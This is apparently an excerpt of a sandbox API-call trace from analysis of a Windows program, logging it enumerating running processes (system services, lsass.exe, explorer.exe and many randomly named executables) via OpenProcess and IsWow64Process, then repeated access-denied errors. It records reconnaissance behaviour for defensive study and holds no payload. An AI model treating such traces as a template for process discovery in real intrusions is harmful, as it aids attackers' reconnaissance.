	[0128.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0128.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0128.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0128.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0128.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0128.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0128.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0128.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0128.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0128.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0128.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0128.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0128.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0128.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0128.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0128.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0128.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0128.030] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.030] CloseHandle (hObject=0x2dc) returned 1
	[0128.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0128.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0128.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0128.031] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.031] CloseHandle (hObject=0x2dc) returned 1
	[0128.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0128.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0128.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.032] CloseHandle (hObject=0x2dc) returned 1
	[0128.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0128.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.033] CloseHandle (hObject=0x2dc) returned 1
	[0128.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0128.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.033] CloseHandle (hObject=0x2dc) returned 1
	[0128.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0128.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.033] CloseHandle (hObject=0x2dc) returned 1
	[0128.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0128.034] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.034] CloseHandle (hObject=0x2dc) returned 1
	[0128.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0128.034] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.034] CloseHandle (hObject=0x2dc) returned 1
	[0128.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0128.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0128.035] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.035] CloseHandle (hObject=0x2dc) returned 1
	[0128.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0128.035] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.035] CloseHandle (hObject=0x2dc) returned 1
	[0128.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0128.036] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.036] CloseHandle (hObject=0x2dc) returned 1
	[0128.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0128.036] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.036] CloseHandle (hObject=0x2dc) returned 1
	[0128.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0128.036] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.036] CloseHandle (hObject=0x2dc) returned 1
	[0128.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0128.037] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.037] CloseHandle (hObject=0x2dc) returned 1
	[0128.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0128.037] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.037] CloseHandle (hObject=0x2dc) returned 1
	[0128.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0128.038] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.038] CloseHandle (hObject=0x2dc) returned 1
	[0128.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0128.038] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.038] CloseHandle (hObject=0x2dc) returned 1
	[0128.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0128.038] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.038] CloseHandle (hObject=0x2dc) returned 1
	[0128.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0128.039] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.039] CloseHandle (hObject=0x2dc) returned 1
	[0128.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0128.039] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.039] CloseHandle (hObject=0x2dc) returned 1
	[0128.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0128.040] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.040] CloseHandle (hObject=0x2dc) returned 1
	[0128.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0128.040] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.040] CloseHandle (hObject=0x2dc) returned 1
	[0128.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0128.041] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.041] CloseHandle (hObject=0x2dc) returned 1
	[0128.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0128.041] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.041] CloseHandle (hObject=0x2dc) returned 1
	[0128.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0128.042] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.042] CloseHandle (hObject=0x2dc) returned 1
	[0128.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0128.042] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.042] CloseHandle (hObject=0x2dc) returned 1
	[0128.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0128.043] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.043] CloseHandle (hObject=0x2dc) returned 1
	[0128.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0128.043] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.043] CloseHandle (hObject=0x2dc) returned 1
	[0128.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0128.043] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.043] CloseHandle (hObject=0x2dc) returned 1
	[0128.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.044] CloseHandle (hObject=0x2dc) returned 1
	[0128.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.044] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
